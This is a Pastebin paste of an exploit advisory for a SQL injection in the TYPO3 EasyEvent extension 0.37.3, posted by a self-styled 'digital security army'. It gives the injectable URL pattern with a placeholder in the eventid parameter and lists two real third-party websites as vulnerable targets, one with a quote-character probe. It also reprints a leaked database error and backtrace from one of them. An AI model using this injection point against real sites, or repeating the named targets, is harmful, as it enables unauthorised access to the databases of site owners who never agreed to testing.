KingSkrupellos

Typo3 CMS T3 EasyEvent tx_easyevent_pi1 0.37.3 SQL Injection

Feb 18th, 2019
57
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.07 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Typo3 CMS T3 EasyEvent tx_easyevent_pi1 0.37.3 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/02/2019
  7. # Vendor Homepage : typo3.org
  8. # Software Download Link : github.com/dwenzel/t3events/archive/master.zip
  9. github.com/CMSExperts/simpleevents/archive/master.zip
  10. # Software Information Link : extensions.typo3.org/extension/t3events/
  11. github.com/CMSExperts
  12. # Software Version : 0.37.3
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. Manage events, show teasers - puzzles, list and single views.
  27.  
  28. ####################################################################
  29.  
  30. # Impact :
  31. ***********
  32. * Typo3 T3 EasyEvents 0.37.3 extension for TYPO3 is prone to
  33.  
  34. an SQL-injection vulnerability because it fails to sufficiently sanitize
  35.  
  36. user-supplied data before using it in an SQL query.
  37.  
  38. Exploiting this issue could allow an attacker to compromise the application,
  39.  
  40. access or modify data, or exploit latent vulnerabilities in the underlying database.
  41.  
  42. A remote attacker can send a specially crafted request to the vulnerable application
  43.  
  44. and execute arbitrary SQL commands in application`s database.
  45.  
  46. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  47.  
  48. An attacker can exploit this issue using a browser.
  49.  
  50. ####################################################################
  51.  
  52. # SQL Injection Exploit :
  53. **********************
  54.  
  55. /index.php?id=[ID-NUMBER]&no_cache=[ID-NUMBER]&tx_easyevent_pi1%5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=[ID-NUMBER]&tx_easyevent_pi1%5Beventid%5D=[SQL Injection]
  56.  
  57. ####################################################################
  58.  
  59. # Example Vulnerable Sites :
  60. *************************
  61. [+] outdoor-engadin.ch/index.php?id=228&no_cache=1&tx_easyevent_pi1%5B
  62. mode%5D=register&tx_easyevent_pi1%5Bdateid%5D=1022&
  63. tx_easyevent_pi1%5Beventid%5D=125
  64.  
  65. [+] laufschule-scuol.ch/index.php?id=359&no_cache=1&tx_easyevent_pi1
  66. %5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=911
  67. &tx_easyevent_pi1%5Beventid%5D=148%27
  68.  
  69. ####################################################################
  70.  
  71. # Example SQL Database Error :
  72. ****************************
  73. exec_SELECTquery
  74.  
  75. caller TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery
  76.  
  77. ERROR You have an error in your SQL syntax; check the manual that corresponds to your
  78. MariaDB server version for the right syntax to use near ') AND uid =1022 AND pid IN
  79. (232) ORDER BY startdate ASC' at line 1
  80.  
  81. lastBuiltQuery SELECT * FROM tx_easyevent_date WHERE hidden=0 AND
  82. deleted=0 AND uid IN() AND uid =1022 AND pid IN (232) ORDER BY startdate ASC
  83.  
  84. debug_backtrace require(typo3_src/typo3/sysext/cms/tslib/index_ts.php),typo3_src
  85. /index.php#28 // TYPO3\CMS\Frontend\Page\PageGenerator::renderContent#212
  86. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGet#215
  87. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#697
  88. // TYPO3\CMS\Frontend\ContentObject\TemplateContentObject->render#752
  89. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#128
  90. // TYPO3\CMS\Frontend\ContentObject\ContentContentObject->render#752
  91. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#107
  92. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#734
  93. // TYPO3\CMS\Frontend\ContentObject\CaseContentObject->render#752
  94. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#45
  95. // TYPO3\CMS\Frontend\ContentObject\ContentObjectArrayContentObject->render#752
  96. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGet#40
  97. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#697
  98. // TYPO3\CMS\Frontend\ContentObject\CaseContentObject->render#752 //
  99. TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#45
  100. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#734
  101. // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#752
  102. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#41
  103. // call_user_func_array#6665 // tx_easyevent_pi1->main# // tx_easyevent_pi1->registerView#75
  104. // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTgetRows#360
  105. // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#370
  106. // TYPO3\CMS\Core\Database\DatabaseConnection->debug#305
  107.  
  108. ####################################################################
  109.  
  110. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  111.  
  112. ####################################################################
Add Comment
Please, Sign In to add comment